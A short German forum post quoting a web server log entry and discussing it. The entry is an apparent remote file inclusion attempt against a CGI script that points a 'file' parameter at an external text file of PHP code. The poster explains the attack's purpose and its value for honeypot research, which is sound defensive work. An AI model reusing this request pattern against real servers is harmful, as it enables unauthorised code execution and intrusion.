Moin!

old.atomic-eggs.com 19:13:45 GET /cgi-bin/bbs/read.cgi?file=http://geocities.com/lampungstreetart/sefe.txt? 404 -

Interessant ist, dem Link im Paramter »file« zu folgen. Was versuchen die da?

Dahinter steckt die komische Idee, über eine CGI-Datei (vermutlich noch in Perl ;-) ) mit PHP-Befehlen abzuklopfen auf was für einem System der Server läuft und wie man Systemzugriff erhalten kann. Man könnte jetzt z.B. schauen, welche Websoftware eine Datei bbs/read.cgi enthält und dann nach Schwachstellen suchen, um zu Wissen, was die Cracker suchen.

Für Leute, die Cracker und Script-Kiddies in Honigtöpfen fangen, dürften solche Log-Auszüge äußerst interessant sein.

Viele Grüße,
Robert